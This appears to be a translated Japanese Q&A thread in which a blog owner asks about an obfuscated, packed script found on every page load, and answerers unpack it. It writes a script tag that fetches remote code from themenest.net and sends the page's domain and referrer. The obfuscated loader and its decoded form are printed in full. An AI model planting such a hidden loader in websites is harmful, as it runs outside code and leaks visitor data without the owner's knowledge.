1

サイトが読み込まれるたびに次のコードが読み込まれているのを見つけました。ブログでの機能について返信してください。

themenest.net は、自分のサイトを読み込んでいるときに表示される URL です。

<script type="text/javascript">
    eval(function (p, a, c, k, e, r) {
        e = function (c) {
            return c.toString(a)
        };
        if (!''.replace(/^/, String)) {
            while (c--) r[e(c)] = k[c] || e(c);
            k = [function (e) {
                    return r[e]
                }
            ];
            e = function () {
                return '\\w+'
            };
            c = 1
        };
        while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
        return p
    }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {}));
</script>

誰でも知っていますか??

4

4 に答える 4

6

解凍すると、コードは次のとおりです。

document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');

...これは、スクリプト リソースがhttp://themenest.net/platform/script/track含まれているドキュメントと、そのドキュメントに移動した参照リンクに関する情報を渡して、スクリプト リソースを取得します。そのスクリプト リソースが何であるかはわかりません (何もない可能性があります。ポイントは単に追跡している可能性があります。ブラウザの [ネットワーク] タブを見て、何が戻ってくるかを確認してください)。

何らかのマルウェアかどうかは、themenest.net との関係によって異なります。:-)

于 2013-04-14T11:58:07.187 に答える
1

そのコードは、次のスクリプト要素を挿入します。

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

おそらくthemenest(最初にテーマを取得した場所)からのトラッカーであり、ユーザー間でのテーマの使用を検出します. これはおそらく彼らのための分析スクリプトです。

スクリプトは次を取得します。

  • あなたのドメイン名(現在のページ ドメイン、テーマを使用している Web サイト)
  • リファラー(そのスクリプトを含むそのサイトのページに到達する前にいた場所)
  • キャッシュ無効化メカニズムを使用して、スクリプトの最新バージョンを毎回ロードします
于 2013-04-14T11:59:45.310 に答える
0

そこにあるように、これはリファラードメインの参照および/またはロギング用のようです

track|domain|r|encodeURIComponent|referrer

実際のソースを表示するには、解凍する必要があります。

開梱したところです。

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

上で書いたように、ドメインを themenest.net サーバーに記録するだけです。

著作権侵害を見つけてください。

于 2013-04-14T11:56:51.837 に答える